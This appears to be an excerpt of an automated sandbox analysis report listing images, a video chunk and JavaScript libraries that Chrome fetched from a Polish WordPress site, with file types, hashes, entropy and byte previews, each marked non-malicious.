                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME.....28.\T... .IDATx...d..........[...Vdw....#...l.......?....~..hH......d....6 x..F3..MvWuu.u.%..g..?d5.ir8d7....U.Zn]Df...}...8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8....pC..Z.eY._....o.X.+..S.u...>..A.,Z...~....q...!j72NX_6I....]^^...t..V.E...l..!A..A..P.%EQ.\.Y,.,............j.3!D.F....-..x........V...v...p..%b4.1.NY............N\NX_../M....g.M......(.+.}....X,.o..o.$..\...E.U....?.Z....>q..A...e.GGGx....o...B.......1..>..Owww{[[[nP..\^^rvv6~........Qq..]....?~....|.......D[..<X.w...8.......o]V...?y....r..=...?KY.<x.z.....F..9i9a.V.@.......|..w....?OZ..~..{.}[)..K...~[.j..{.;z..I...q.\.4.>...[...B...jH7...............%I.......>.#km.F...7)+o8..S..{{{{n@...{{{h.........s#....V..'....n0..#n..'O.+km....oBV../..~..r...WI...~.......w#...b........n0
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 250x250, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, manufacturer=samsung, model=SM-N910C, orientation=upper-left, xresolution=151, yresolution=159, resolutionunit=2, software=Adobe Photoshop Elements 7.0 Windows, datetime=2017:09:08 13:55:31], progressive, precision 8, 787x486, components 3
                                                            Category:dropped
                                                            Size (bytes):592599
                                                            Entropy (8bit):7.980585804243511
                                                            Encrypted:false
                                                            SSDEEP:12288:BGPKhrf520okOdgl8ymsZIdjaBi25plwWXGpLJ9sNEIEfBaUZcKYJ:BGPKRf52LFA+djE/wDk2fAUZcl
                                                            MD5:075DA6110BD086396036C11B112C7957
                                                            SHA1:49D2A50FB908FB0C59316E1B2F4C7550134CF126
                                                            SHA-256:F038E0062C75FC2FA263561C06DC7AE64D011742BED9303006D5D559F9A1A635
                                                            SHA-512:248AEE876850AA24F2A068F2BF962C65DC3A933BFD0D8BE3E2036363A2F95150E598B19C6DC921F71AEF7C9D5A00318BFBCF7903BA2649F5D602D56A1F7AB806
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF............+:Exif..II*...................................................................(...........1...%.......2.......................i...............samsung.SM-N910C..%&..'...%&..'..Adobe Photoshop Elements 7.0 Windows.2017:09:08 13:55:31..........................."...........'.......P...........0220........"...........6...........J...........R...........Z...........b...........j...................................r...........z...........0100.................................................................................... ...................!...........2017:07:07 08:43:13.2017:07:07 08:43:13.....d.......d.......d...............d.......d........................H16LSHA00SM H16LSIG01SA................................................(...............................$(......H.......H.............JFIF.....H.H......Adobe_CM......Adobe.d...............................................................................................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 592 x 269, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):6971
                                                            Entropy (8bit):7.879627851828711
                                                            Encrypted:false
                                                            SSDEEP:192:uEYYYIidFR78MnQ9C497qds9PEE+UhfEwIjbXyXwqeCFjDX:RYYYpdnQ79n97J+37jjyXzTlj
                                                            MD5:2D4F8F477ECE4F0AB909D609799662E4
                                                            SHA1:BFA3515E134142F29EE7D9040AE212A1C5D5F466
                                                            SHA-256:A2F715FE55E788CCE7DBC1DFBC6102385B676381126F0CDBA0111CA978CA0750
                                                            SHA-512:BA89C099495804B14509DDF654A4B6242A9F09C372C4F995F3983304DDEBFCB4E7CDDA3CDDDBDD5AA96B968AA8FEF1342F9F8D49F86B27D5493DCC3D3F49B4A9
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2017/03/Disney.png
                                                            Preview:.PNG........IHDR...P...........[.....gAMA......a....:iCCPPhotoshop ICC profile..H...wTT....wz..0.)C.. .7..Da..`(..34.!...ED..A."..."."...`... ..`.QQy3.Vt.....g}k...=g.}.......tX..4.....J....c........`.23.B=.H>.n.L..."..7w.+.7....t..I...........d..P....}F....1.(1.E..........";....c.X|..v.[.=".%....qQ...-.[".L..qE.V...af.."....+I."&..B.D....).+........Rn...|nb........2...T.@`..d.0.l.[zZ......?KF\[....f...F..f_..n.M.{.H..?....}..._z=..YQmv|.....c3.....4.. ).[..W....%I .31...6.rX.......7.......(..........S.|zf.....y..q._..0....sx..p.qy..v..\.7.G...S..a..8."Q.>.j.1......>.....s@....7.|8.......,...e.%...9.-$............H.*P.*@...#`.l.=p......0..V..H.i...A>...@...v.jP..@.h.'@.8.....:..n..`....`......a!2D.. UH.2..!...y@.P....A....B..&..*...:....:.]..B..=h...~....L...2............p"......p.\.......u.6<.?.g........!....D......C..J..iA..^.&2.L#.P...EG...Q..(.j5j...U.:.jG..n.FQ3.Oh2Z.m..C..#..lt....nC_B.F...`0..F.c...Da.1k0....V.y. f.3..b...X.l ...`..{...C.q.[..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):19101
                                                            Entropy (8bit):7.976466090959319
                                                            Encrypted:false
                                                            SSDEEP:384:IaX0b2nze7nZLs9RW/tka8NPtpKXa9wk2APWJGchAGIhWTzUCnZZLUkb:d0SnSdLsXWz87pUgr4rIhW3U4ZZJb
                                                            MD5:9DF022E7B26F5A7A3A63CC0FD24A7E30
                                                            SHA1:15902947EE507B0D196BF45BE1FB409D8C10C6DA
                                                            SHA-256:9B97E1ACD91BE36B6FBC932BBD1079930A5282F6DBA5A776D4979C76BDA99D19
                                                            SHA-512:A5BA0565F120F9D7EA553C9FA9D90AB28213AB95CAE274DF31263DD3AE81688B357801D2961ED56E1FF7176F76F2A4F74758F9C55184C78F7427B13DBE76049E
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...xSW...m.J.............m......6...c.`P.....w)R(...jPo....iB.Fn.I..=.}r..s.....{.....E...@.L0C)..=|.0?,,..9..h.`..........<w.....7...l.9..@.....h7.w.Y<.H.....|.3I..6..y....|.&.....T....[.5*n..S.Ei6aS..T0.G.eH.?.x..BiC..R.$.9EJZL...>3...0X0.....[.!{.D....v...|...."..Od..de..b.i.....kT(J..eq:2.(.....2.{HV/....cN.e.)....L..B.R@.PUrS.2Y..*.*..v)&...<4..3.S.E...Y|....A.4...D.E..]...a.6$.e.v......................./...t...7v_|.yc[...M..T...Z..[......=.....q|. .9r.....q....9.M.4.wtt.iV..\...u.....<..m...',o..P..~...'.......q...4h`..,>......=e2.......j..@......aj.q.g....SY(..qss.I..l-.v......O..B..B.l..3 .x.eQC.3..f.,.#..F....3..R".2...~.zr.Z.|..5...Hy8.@>...4../..*666?$$...8.@....*00P...65.~,.^].!5S.3G...P....]"R._ .*.T.....G....>#.38.....V.*....m...j.{.^....o......YE.+RE.b..8..L..U....".`.I...[....J....."K'.5%:......C.;/E...t.q......Udx..`.T....`............9....5.2....m..'o(.m......b....
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):26134
                                                            Entropy (8bit):7.972341752081497
                                                            Encrypted:false
                                                            SSDEEP:768:ZcB9j81DGCU9yM1c9h9Zv+bAjZengHkIr+r1UYh:Zj1DfrjZv+pngHdr9w
                                                            MD5:C936F3654069E8767EB26BDE36B9B4F3
                                                            SHA1:32561511CAF7FF1AF2BB8575C1178424DFA83B4F
                                                            SHA-256:D453342FD600DE3570DB04926400900B623726E7C7856E722B69EFF3046A876D
                                                            SHA-512:135E6634638D4E4876F82AC3C6A20DFD94893F62BC66A9FBC6716ECC81146213DDA9FAC9064CA94FD4323ECBB3DA09B4DA80EDF4ADEA2852F7ADC59782B3D94B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME.....:....... .IDATx..y.\.u.....Ts...s.ZRKB..B .....6......u........g.&...NVV.o...$.6...1...d.#$$...Bck.V...s......F..c&.s>Z..n..:.......................................................................................................................................................................................D`.7...Y,..hff..lvE.\Nz...,.....m..x<~...ak8..G!..X&...4.........x.:.^......b1......Ho.*...r.\.G6.%..RWWw......x...!..J.`...jff.....~7..G...hll.......4.t.\.W....VCC.......m.....?<y..................%...,Z.........`...*t..G}.....E8......b....0.i>.h.w.!J.U..z+..PJ..8p.........(.....`lllf.U[..G..:.J Xo..2......:...+VD..*`..:t.Pa......o.B..U.....U.P..c....+. W.p>.J.C...K....H.h...k..}._..3.<.f.P V./%Z...+n..r.0...a X...J..wx...h4..$.%....>|8.q...!D&..C.&x.b.:r.....X..R..(...#G.<..........+sjj.O|.......$..............6.....f.V..........#.W.......^k......!V.3g....!.....&
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):16863
                                                            Entropy (8bit):7.973709002545227
                                                            Encrypted:false
                                                            SSDEEP:384:INYW/LYtMSpkvmHKkRPDa1yOH+HWgbQPWv4DLZGMDFQJ05MQ:KdTYHwkDaVzPWuLZly05V
                                                            MD5:29A2BA4B1B597ADCD93F7A254A8979D9
                                                            SHA1:B2C01BA6639772E03F86054879C1494D01721369
                                                            SHA-256:BAC0B9BFBEA63E82F48BF78BBC63E7C0C5D95B88F09B278B592B6D0E713D55B5
                                                            SHA-512:669A7B4FF2FBDB631E1E00958C711128AD2126A4B7FFAEC8804BC10321A949F0806FF2EDB1D1459CC79223F5D8C681557D4F6EB655F4373401DE80B204CEA381
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...|......^.;.......E,..+UE.....b.^{..go(........ .........}..$l.........;....<.=g....!G.x...<.H90..s..O.>..=E.3F...%..a.....5k..5j.....555..g..C....O`.K.....Y]...7.x=..V.{><.0.1..1W........y....>S/..Z..w.!...W....^....sc..K.."|..Pf........'n....gMF......I._...3.C.n.......}'....1d.....S.....?.z...g..M.O..J.....JI...W...$....;...K.R@.....$..1r..i....%..-S..c......-...Q`...X....(.../..6l.a..<"...a.q!...;0.J.........T*U.A....1bDL2X.5...j...xZ7.P(.i.W....g....<xK$..;0... .Y...4....B..4..j`......aPm....v{.....CD..k.y,.#.SE......".....6m..2dHj8.F.y..x$(...7.*..z1.......{...$(....+....}.&R..j..lXAQ:..8..%........<....;(.9.........u.......y.).53.uI.z....+..........>.U..w]'..7..k_.(t.b..TZ..)0.i...9^.znK...T7..]...>M.....x....U.W..i.p..;(....`............K.5.f#....\.H*).XA......?G>..-......4.V...W7r....s.K.Mg............1...}.....<.pI.._.1c..:.V....b..>.5...J..^...Z.....
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 314x314, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=21, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS IMAGING CORP. , model=E-3 , orientation=upper-left, xresolution=339, yresolution=347, resolutionunit=2, software=Adobe Photoshop 7.0 CE, datetime=2018:07:26 14:23:50], baseline, precision 8, 500x500, components 3
                                                            Category:dropped
                                                            Size (bytes):73813
                                                            Entropy (8bit):7.749537116212058
                                                            Encrypted:false
                                                            SSDEEP:1536:p2VizNgaqVweuunX9XLO4LXUCdJQbzCYmDtDMIF+e3:E6hYXdKmfs43+e3
                                                            MD5:3DCAEFC511194C68C7A29ED7BF16DD92
                                                            SHA1:548EEB5F370BD04FF5F811BFEFF481AB0A38C42E
                                                            SHA-256:2A0E6EE236F38D5BDD769A36E68E94005F55BB4AB1D6DDFAEDFE4FEDEE92A7AB
                                                            SHA-512:DE7ED2110BCB301692B320EECB954B37BD606F9F48239C0C088654C67C43C028F71419102C711661F2402F6534F3DB36ACA8FE15BB020910E85AA447F7772C5A
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF.....:.:......Exif..II*........... ...............*...........B.......................S...........[...(...........1.......c...2.......z.......................................................................................................................................i...........l...OLYMPUS DIGITAL CAMERA .OLYMPUS IMAGING CORP. .E-3 .:.......:.......Adobe Photoshop 7.0 CE.2018:07:26 14:23:50.d...d...PrintIM.0300..%.............................................8.................P.....`... ..................................................................................................... ......................................................'.......'.......'.......'.......'..^....'.......'.......'.......'....................................................................................................................................@@........@@........@@............@@........@@........@@..........................................................".......
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1193), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):1193
                                                            Entropy (8bit):5.032731338787412
                                                            Encrypted:false
                                                            SSDEEP:24:pY4YRVssO7j2I2t3Sr+Eq5D3Djqd/+XGDPDLUDORZGbMDbhLM9yAf6CKu4:l6VssKKLt38qdz0gqbcOLGbwbhM9yo6v
                                                            MD5:F34F415AA56ED900EECF3F212ADB57E2
                                                            SHA1:352DFEEC21817198C07AB11705B53D813420CEA3
                                                            SHA-256:7F34B768792B90CF0B04FCED2470E43D8FAB7644F6565D5178FBFB49C4859CEE
                                                            SHA-512:361BFEB636F7D73DF236059BB7568C40E74FAB5639C5CCCCDC598A70EC37695265FB08AEF61DB1F9FD927775000852F42720B43722E8D6C6FE3A8F5A568FECE2
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:!function(a){void 0===mejs.plugins&&(mejs.plugins={},mejs.plugins.silverlight=[],mejs.plugins.silverlight.push({types:[]})),mejs.HtmlMediaElementShim=mejs.HtmlMediaElementShim||{getTypeFromFile:mejs.Utils.getTypeFromFile},void 0===mejs.MediaFeatures&&(mejs.MediaFeatures=mejs.Features),void 0===mejs.Utility&&(mejs.Utility=mejs.Utils);var e=MediaElementPlayer.prototype.init;MediaElementPlayer.prototype.init=function(){this.options.classPrefix="mejs-",this.$media=this.$node=a(this.node),e.call(this)};var t=MediaElementPlayer.prototype._meReady;MediaElementPlayer.prototype._meReady=function(){this.container=a(this.container),this.controls=a(this.controls),this.layers=a(this.layers),t.apply(this,arguments)},MediaElementPlayer.prototype.getElement=function(e){return void 0!==a&&e instanceof a?e[0]:e},MediaElementPlayer.prototype.buildfeatures=function(e,t,i,s){for(var r=["playpause","current","progress","duration","tracks","volume","fullscreen"],l=0,n=this.options.features.length;l<n;l++){va
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90", baseline, precision 8, 500x500, components 3
                                                            Category:downloaded
                                                            Size (bytes):73410
                                                            Entropy (8bit):7.96566142460689
                                                            Encrypted:false
                                                            SSDEEP:1536:bAk1YQkKVgODoiBcsOMYqrNweNaOlUEB1p5S3jK:ck0WdDbB4u2QflUEB3
                                                            MD5:28483DC93E9D2ED1BFFF609874C81419
                                                            SHA1:3BE3FA85A28BF942BBBEC7CC7C4354120BF71990
                                                            SHA-256:50458C105C6A39EA248A2E8CC8233AA9BBAD4B69BC316CCE721583A95379488C
                                                            SHA-512:F21EC4FF12E92878EAF67823F35B9F43A1C4B45EA673BFB833B5413C90B23388FFA35338CFDAE0335A02959720A0CCF5CF38D0FAC954F76B5677DC1EECFF0BD6
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/12/wedding-album-1205692_1920-500x500.jpg
                                                            Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...my.... W.....4....K...M..5..oM......~....}......u.s...X)rW.s..+..>he.=i.r*FL..s...S..6.....SW.M?=z.;..M&1.h...<z..R."..F.g..<.=.A.......)..pjx...V\..!....1O.....P}.i...y..B.=3M..<...z..vc.x.4.B..\.MI....J...#.0..l'..nxS.z.X4..K...8K{H.....z.........(6..]A|=.6....=..Fo...k..&...{....^...{......
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (6694)
                                                            Category:downloaded
                                                            Size (bytes):31125
                                                            Entropy (8bit):5.026093168401823
                                                            Encrypted:false
                                                            SSDEEP:384:Y9lleYtgOH1lJ1rRZ56d4+Sg74Xwi+R5qhCOYFd:WDH7JhUNV8wi+7
                                                            MD5:4DB1AABE45C049DF4D33098CA0943EDD
                                                            SHA1:9AA48588B0F835B3421D1AFC9BC1B753121A5AA1
                                                            SHA-256:3D891A2A9BEAC7CD76F04B72710D9B640B9DA9CF5215A0C5DB94363C0B218585
                                                            SHA-512:287423EF0DC2523558DAEAEEA28F138CFFBA1D677AAFC4E9E68605B9B80BA0181030B58E0998CD84E5FF6F9A628BD25955D1A7522F36EA5B772FEFC862B96F78
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/js/midnight.js?ver=1.0
                                                            Preview://midnight init .../*!. * Midnight.js 1.1.0. * jQuery plugin to switch between multiple fixed header designs on the fly, so it looks in line with the content below it.. * http://aerolab.github.io/midnight.js/. *. * Copyright (c) 2014 Aerolab <info@aerolab.co>. *. * Released under the MIT license. * http://aerolab.github.io/midnight.js/LICENSE.txt. */. // jQuery Widget.(function(e){"function"==typeof define&&define.amd?define(["jquery"],e):e(jQuery)})(function(e){var t=0,i=Array.prototype.slice;e.cleanData=function(t){return function(i){var s,n,a;for(a=0;null!=(n=i[a]);a++)try{s=e._data(n,"events"),s&&s.remove&&e(n).triggerHandler("remove")}catch(o){}t(i)}}(e.cleanData),e.widget=function(t,i,s){var n,a,o,r,h={},l=t.split(".")[0];return t=t.split(".")[1],n=l+"-"+t,s||(s=i,i=e.Widget),e.expr[":"][n.toLowerCase()]=function(t){return!!e.data(t,n)},e[l]=e[l]||{},a=e[l][t],o=e[l][t]=function(e,t){return this._createWidget?(arguments.length&&this._createWidget(e,t),void 0):new o(e,t)},e.extend
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 1 x 1, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):921
                                                            Entropy (8bit):5.80302510812885
                                                            Encrypted:false
                                                            SSDEEP:24:ry1he91Wwjx82lY2T3ouVZnz3yJ3VMEfmqM78Gd:rwqQNn2xHziJ3VzMQc
                                                            MD5:69347101E112A650903E7BF14F8A8430
                                                            SHA1:BBC00C01EC15BF5338A2D092AF8E218FE1F2D243
                                                            SHA-256:563991EACC81C022A5E21A6F16C5E9ADD8382399D7286492A08EA319609ABC08
                                                            SHA-512:9CFA085BB1A4D01DC812C450BE2C3DDD48B7761F990034D96FB76758EA2E6288D72999E2176BDCF57DFFA3D98D722F60E51C76498FC451BF527D1BC8BBBB2D81
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR.............h.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:3D8956D2B79511E3AB989EBDB752CBD4" xmpMM:DocumentID="xmp.did:3D8956D3B79511E3AB989EBDB752CBD4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3D8956D0B79511E3AB989EBDB752CBD4" stRef:documentID="xmp.did:3D8956D1B79511E3AB989EBDB752CBD4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.<.m....IDATx.c...?......x......IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):31888
                                                            Entropy (8bit):7.985000268153039
                                                            Encrypted:false
                                                            SSDEEP:768:cUaz1Pjt75GpWxuxC2pKCI+SXE++rYjqY:h41PV5mWCkztXA+f
                                                            MD5:E2CB3D5023FF58EA37415AFDE65FB853
                                                            SHA1:CC622F18941C14C08F79DE82B362F62FDFFD55DF
                                                            SHA-256:208FFCA78C1017F0C96A17925F0571BBA2CE5B0E30834298EB62EC708CE435A8
                                                            SHA-512:D9775B3A0A1FB60C07373A9387796762AED477D0E21296BDAF7623B4E07130C39DB78856BB704ADC06B848EE5FA81D2B5FE3E1525AA405D3C004DC5BC7A6249E
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME.....28.\T... .IDATx...d..........[...Vdw....#...l.......?....~..hH......d....6 x..F3..MvWuu.u.%..g..?d5.ir8d7....U.Zn]Df...}...8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8.....p8....pC..Z.eY._....o.X.+..S.u...>..A.,Z...~....q...!j72NX_6I....]^^...t..V.E...l..!A..A..P.%EQ.\.Y,.,............j.3!D.F....-..x........V...v...p..%b4.1.NY............N\NX_../M....g.M......(.+.}....X,.o..o.$..\...E.U....?.Z....>q..A...e.GGGx....o...B.......1..>..Owww{[[[nP..\^^rvv6~........Qq..]....?~....|.......D[..<X.w...8.......o]V...?y....r..=...?KY.<x.z.....F..9i9a.V.@.......|..w....?OZ..~..{.}[)..K...~[.j..{.;z..I...q.\.4.>...[...B...jH7...............%I.......>.#km.F...7)+o8..S..{{{{n@...{{{h.........s#....V..'....n0..#n..'O.+km....oBV../..~..r...WI...~.......w#...b........n0
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ISO Media, MP4 v2 [ISO 14496-14]
                                                            Category:downloaded
                                                            Size (bytes):1048576
                                                            Entropy (8bit):7.998459354765736
                                                            Encrypted:true
                                                            SSDEEP:24576:1eisXdMuz2uILbmN5+v3cWkpgsDW9l7eBrBrhkspW5PK:1uOfutN2334zDO6rOspWpK
                                                            MD5:ABC0F7BA8BD33FB9FCDB60919C732877
                                                            SHA1:BCCAC65FC059A2C7699147006FA718DF32F5D630
                                                            SHA-256:9B5668A8EA5661CC1E02550C4EA7BE35D30A45E6DAE514BF0314DE393675D79D
                                                            SHA-512:641B23DE3F839102278864BE4384E27F0E33887766EC4A58ECFB85F1D21182EBAC2B9F8920765535EE3A292CB9BAE86BCC6F663E8A72558D1AB36EED6FB9BF2B
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2016/02/city_1.mp4:2f8a52234edc61:0
                                                            Preview:....ftypmp42....mp42mp41....uuid.z...B.q....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145631, 2012/02/01-07:50:30 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpDM="http://ns.adobe.com/xmp/1.0/DynamicMedia/". xmlns:stDim="http://ns.adobe.com/xap/1.0/sType/Dimensions#". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmp:CreateDate="2016-01-12T11:00:39-05:00". xmp:ModifyDate="2016-01-12T11:00:39-05:00". xmp:CreatorTool="Adobe After Effects CS6 (Windows)". xmp:MetadataDate="2016-01-12T11:00:39-05:00". xmpDM:videoFrameRate="23.976024". xmpDM:videoFieldOrder="Progressive". xmpDM:videoPixelAspectRatio="1/1". xmpDM:startTimeScale="2997". xmpDM:startTim
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):19870
                                                            Entropy (8bit):7.978052151519322
                                                            Encrypted:false
                                                            SSDEEP:384:IO7c3tAbsgODpT+k25sCIcUhLMys9Tr2s0h4Pqoage98AQ2b1sDw91J:b7c3ui0lIBMyc2s64PqnuosDw91J
                                                            MD5:5D6FCBA87A5C9233C701EA1F5B767B6D
                                                            SHA1:2094E1E3DD7AC4A9C703E6C8B510F74E3282778D
                                                            SHA-256:FBC360FB2A51B602A44561E52B04D7B74003174B7F1B9809E6CCD61DA0437F85
                                                            SHA-512:1E59FE00CCB485F0081C0619AB3C8F34C8E7D0EBBD28C0F104CF29F0F01510245E6C799ADB604376457BDA141F1CCF37E0F6E034D1EE2457FA4ECB0EA3C2F107
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME......*.}.... .IDATx.....y.....u.}..=.3....E. ..%.5)i-yC...[......o.~...?.-Gl..a.w..B+.6v).%.$A.7....}wO..]w...L.....M....DT.g0].......<..`.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,?....'.1.........W...8.+Y....|..<...~.T*]........7!DfG.../.Hy.n......N..:U*.(.J..E. ..};H?.$IB...z=....n.j.zqzz..J..".H.(Y.........uuu..*.J.j......_ ...h.Z.z......E.^..pY.........s....T*.....%p_...t........P(..6\.... V..7_RJ.x...r...._"..!kkk............+X.F..Z.c..\xunn.6==m.....677.O.>.+R.+B.cG...E...p../]...O.8....r.m].tip..?..r...B.Q...3...`...].?O.8..\..Q.$..K..G.Q>..WV..`.L.@...g.y........{.7|..>.8....Z..Y.V...^{..'.B.........|.r...? ......v.~b...\.......+...P(0??_.r..K.....OR..F..R........H....z..h........OJ.*7n........a..8x. 7n....1.;.V.>.............-?IhX..Kw....c.gG.........
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):43499
                                                            Entropy (8bit):7.982857357893048
                                                            Encrypted:false
                                                            SSDEEP:768:sQHz2KKIJ5DrK4fyYPWwcYsgHlsJPzaLSWMlZRk2Vnp89gh7Vz4Ff:LKIrKcyYPxcYlaaeWMzRVn0g5V4Ff
                                                            MD5:DF1E885C31F85EC9B4A5492D0286CFAF
                                                            SHA1:A70D66464162C4652920696C4D36C73DE40CE372
                                                            SHA-256:38EE1BA354511EB971BF06405C36E8C8B0C9D3E96A2C0ABC9221F6A22AA8AF31
                                                            SHA-512:828C5DC93DD25295D26A0BD82A7D9AFEB31E059C2D3F76F8EBDBF55677C61E22C85A3B4BBB20FBBE21D94D8FDF370A79751320D636DD432743B34734D76739C5
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_captain_jackie.png
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME.....44.... .IDATx..Y.e.}...og.k...z.H....T,.-..u........<$.C..d....9/Y..!......g........ZHJ.d.....~...K..m....b..v>@..........................................................................................................................................................................................?..Y.......?....:..+..o.m5+..c."..Y..}{}}...4....Y.F.......f........Ow.]....N.8....Y....eIQ...sf............Y...GB..Y.F..J..p8.o.=z..v............5....x.|>_^.|..X__..F....+..-.....{.U......4V....k....l6.q....n....]l..X%w......._.L.....".2vww.Z....?/..Ui../.P...3o.....\.0...n..o0.........../K)..B.fU...."V*....[..s.=.j...'..[...=...i...!\.*.`....r...n...=..s..U5|..,.u.V...O.'.V..lD....P7.9...^{...g.F..~.h}.;..^|../*..l..F.......+..>..v..,H..e.X..;.L_z..B.i.".6d...f.J.}..?...i..O..n....{..w. ..4+....)V.....:.^...i...Gbgg.......e.A7+....%X.;w...k.5.....k.q..."..oV....C.......
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1920)
                                                            Category:downloaded
                                                            Size (bytes):9612
                                                            Entropy (8bit):5.2446804466393875
                                                            Encrypted:false
                                                            SSDEEP:192:P1a7G++jacaTOh0Zl049XyGzNmjaEg9Qi6TxOYFfycBmSCc:ADDTOhgxXyGExOYFd
                                                            MD5:E85F66A08398F0144DDCF6E384301BE8
                                                            SHA1:80D9B515C59442D1C46F0C7E7DE2C36AE74D287A
                                                            SHA-256:8A8290242F239D419D97904A0C27AECC3003312220BDB7FB966F35637F9822D6
                                                            SHA-512:B8E93EAC8F95D6889E942D78A7773EEA0170041B851DDD3606910E8E4FF9D54DE1C59B16981ADC454031DD9F9ABBAE8D8F5BDBD38A8590C14EC8EF516FC9A64C
                                                            Malicious:false
                                                            Reputation:low
